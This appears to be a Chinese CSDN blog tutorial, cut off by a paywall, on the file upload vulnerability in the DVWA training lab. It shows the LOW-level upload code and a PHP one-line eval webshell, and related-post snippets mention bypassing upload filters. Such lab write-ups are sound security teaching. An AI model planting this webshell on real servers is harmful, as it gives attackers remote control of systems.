DVWA之File Upload(文件上传漏洞)

最新推荐文章于 2024-09-15 22:26:42 发布
最新推荐文章于 2024-09-15 22:26:42 发布
阅读量4.4k 收藏 8
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40586270/article/details/81735256
版权
该博客详细分析了DVWA中LOW和Medium级别的文件上传漏洞,包括服务器端核心代码、漏洞利用方法以及提权技巧。在LOW级别,由于缺乏文件类型和内容的检查,攻击者能上传木马获取webshell。Medium级别虽然限制了文件类型和大小,但通过文件包含和文件名截断等手段仍能绕过防护。
摘要由CSDN通过智能技术生成

      由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。

      下面对不同级别的代码进行分析。

一:LOW

1、服务器端核心代码

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // Can we move the file to the upload folder? 
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
        // Yes! 
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 

?>

        可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。

        文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。

 2、漏洞利用

(1)首先先上传一个一句话木马hack.php,参数名(一句话木马口令)为hack

<?php
@eval($_POST['hack'])
?>

上传成功,并且返回了上传路径

最低0.47元/天 解锁文章
LTW.Hinscheung
关注
专栏目录
DVWA文件上传漏洞
sunshine1_0的博客
01-20 1809
文件上传漏洞 低级别 中等级别 高级别
DVWA系列---File Upload 文件上传漏洞
野原新之助
01-27 551
文章目录一、前言二、Low级别1、演示三、Medium级别四、High级别 一、前言 文件上传漏洞是指: 服务器对用户上传的文件没有进行严格过滤,导致用户上传了一些危险文件(如一句话木马的php文件),然后访问这些危险文件,对服务器造成控制或破坏。 预防方法: 1、对用户可上传的文件类型及进行严格控制,设置白名单,防止用户上传危险文件; 2、对上传的文件进行文件名转换,防止用户直接访问到上传的文件...
dvwa文件上传漏洞】--文件上传漏洞总结
m0_63241485的博客
08-30 3889
文件上传漏洞--dvwa
DVWA】——File Upload文件上传
最新发布
HinsCoder的博客
09-15 705
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA文件上传漏洞(high)
感谢关注
12-16 588
2.在放该图片的目录里面打开。1.随机创建一个图片,命名为。,再借用蚁剑即可破解。
DVWA文件上传漏洞之High渗透测试
Xlucas的博客
08-11 381
DVWA文件上传漏洞之High的渗透测试
DVWA文件上传high级文件上传漏洞
热门推荐
IT1995的博客
03-11 1万+
1.制作“内涵图”:图和文本如下图所示:先看看1.jpg的二进制文件:下面执行如下cmd命令b指binarya指append(猜的,此处不太确定,但感觉有很有道理)下面打开2.jpg看看此时进入DVWA上传进行正常访问:设置成如下:下面进行畸形访问:最后如下图:(注意hackbar里面的Post data)...
DVWA文件上传漏洞File Upload
qq_54537919的博客
06-27 628
DVWA文件上传漏洞File Upload
DVWA-File Upload/文件上传漏洞
jammny
11-22 1169
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
DVWA关卡5:File Upload文件上传漏洞
m0_54899775的博客
12-07 1387
DVWA关卡5:File Upload文件上传漏洞
dvwa中的文件上传漏洞
无痕的博客
01-12 8456
dvwa漏洞环境演示文件上传漏洞
利用DVWA演示文件上传漏洞获取网站shell权限(High级别)
weixin_43822401的博客
06-13 678
文件上传漏洞是网络安全中常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件到服务器上,从而获得对网站的远程控制权限。本文将以DVWA (Damn Vulnerable Web Application) 为例,演示如何利用文件上传漏洞的High级别设置,绕过文件类型和内容限制,获得网站的shell权限。
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4439
DVWA文件上传
DVWA文件上传漏洞upload
kirito_pio的博客
06-04 1769
目录 1、low级别(直接上传) 1.1 上传文件 1.2验证 2、medium级别(使用Burp Suite进行代理) 2.1 进行代理配置 2.2 文件上传 2.3 验证 3、high级别(进行文件合并) 3.1 文件创建 3.2上传及验证 1、low级别(直接上传) <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable..
文件上传与包含漏洞综合利用】DVWA-文件上传-难度:High
Mr_Fmnwon的博客
04-24 1328
一方面,(任意)文件上传漏洞指的是上传非预期的文件格式(如php文件)到目标服务器,而通过其他方式(直连、包含等)进行执行来进一步利用。另一方面,利用文件包含漏洞,能够把静态文件中的php代码通过回显转发的方式进行包含执行。过程中遇到很多问题:1.high的包含漏洞保护措施没有关注 2.一些jpeg/png图片被解析时,自身的一些字符会被错误识别为php代码,而往往会导致语法错误,通过copy到最后的。可以推测,检查是否为JPEG/PNG图,是依靠文件的后缀、文件头字段信息来进行双重检测的。
DVWA靶场-文件上传漏洞
Cobra的博客
01-27 1452
DVWA靶场-文件上传 一、low级别 1、该级别没有任何防护,直接.php文件上传即可。 二、Medium级别 1、我们先尝试上传.php文件,发现上传失败。 2、我们使用burp suite抓包, 把上传的PHP文件伪装成image/jpeg文件再进行上传。 3、修改Content-Type为可执行的后缀名之后,在进行上传即可成功上传。 三、High级别 1、我们尝试上传.php文件,发现上传失败。 2、我们可以利用一句话木马来进行绕过。 ...
DVWA-File Upload(High)
七月_的博客
10-23 1208
文章目录File Upload(High)代码分析 File Upload(High) 代码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $...
DVWA-文件上传漏洞代码审计(Medium、High)
oyqsb的博客
06-12 594
需要利用文件包含漏洞来执行php脚本,将上传的图片位置贴到文件包含漏洞利用处,访问后会返回一堆乱码即成功。若服务端脚本语言未对上传的文件进行严格的过滤,会导致用户上传木马、病毒或恶意脚本,从而获得服务端的控制权限。:返回一个字符串在另一个字符串最后一次出现的位数(注意字符串是从0开始而不是1)将一张普通图片和php脚本copy出一个包含木马的图片。打开蚁剑添加url和密码。:通过指定长度来截取字符串,通过和上一个函数的配合截取出后缀名。:将上传的文件移动到新位置,这里表示移动到指定目录。
DVWAFile Upload模块展开实验
06-10
好的,我可以为您提供一些关于DVWAFile Upload模块的实验步骤。首先,您需要了解一下DVWA是什么。DVWA(Damn Vulnerable Web Application)是一个用于练习网络渗透测试技能的虚拟机环境,其中包含多个漏洞,可供练习和学习。其中就包括File Upload模块。 以下是一些关于DVWAFile Upload模块的实验步骤: 1. 首先,您需要在本地安装DVWA,并启动它。您可以使用XAMPP等工具来安装和启动DVWA。 2. 登录到DVWA并选择File Upload模块。 3. 选择一个文件并上传。您可以尝试上传一些不同类型的文件,如图片、文本文件、PDF等。 4. 观察上传后的结果。如果上传成功,您应该能够看到一个已上传的文件列表,并且您上传的文件应该显示在列表中。 5. 试着上传一些恶意文件,如包含恶意代码的文件。观察上传后的结果并尝试分析它们的影响。 6. 尝试绕过文件上传的限制。您可以尝试通过修改文件扩展名、使用特殊字符或修改HTTP报文来绕过文件类型和大小的限制。 7. 尝试利用文件上传漏洞进行攻击。您可以尝试上传一个包含Web Shell的文件,并尝试通过Web Shell来获取系统权限。 需要注意的是,您在进行实验时应该遵循合法的道德和法律标准,不得以任何非法或不道德的方式使用这些技术。同时,您应该在安全的环境中进行实验,以避免对其他人或组织的系统造成损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值